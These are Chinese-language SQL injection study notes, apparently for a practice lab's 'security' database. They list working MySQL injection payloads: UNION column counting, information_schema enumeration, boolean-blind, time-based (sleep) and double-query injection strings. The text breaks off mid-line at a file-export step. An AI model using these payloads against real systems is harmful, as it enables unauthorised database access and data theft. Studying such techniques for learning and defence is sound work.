SQL注入学习笔记（一）

空格是%20，单引号是%27， 井号是%23，双引号是%22 //常见urlencode
order by 3 //猜字段个数
select 1, 2, 3 //增加临时列
mysqli_fetch_array(conn,sql) //返回第一行记录
concat_ws(char(32,58,32), ‘语句1’, ‘语句2’…) //连接成字符串
limit 0,1 //选定待查询的记录行
substr((%s),1,1)

//爆库, 爆表, 爆字段
database: information_schema(包含了MySQL服务器所有数据库信息)
table: schemata (schema_name)
tables (table_schema, table_name)
columns (table_schema, table_name, column_name)

//布尔盲注
and length(database())>=0 %23
and ascii(substr(database(),1,1))>=0 %23

and (select count(table_name) from information_schema.tables where table_schema=’security’)>=0 %23
and (select length(table_name) from information_schema.tables where table_schema=’security’ limit 0,1)>=0 %23
and ascii(substr(select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1)>=0 %23

and (select count(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’)>=0 %23
and (select length(column_name) from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1)>=0 %23
and ascii(substr((select column_name from information_schema.columns where table_schema=’security’ and table_name=’users’ limit 0,1),1,1))>=0 %23

//基于时间盲注
and if((注入布尔判断语句), 1, sleep(5)) %23

//聚合函数+分组语句->双注入
union select 1 from (select count(*), concat(floor(rand()*2), (注入爆数据语句))a from information_schema.tables group by a)b%23

//导出文件
select “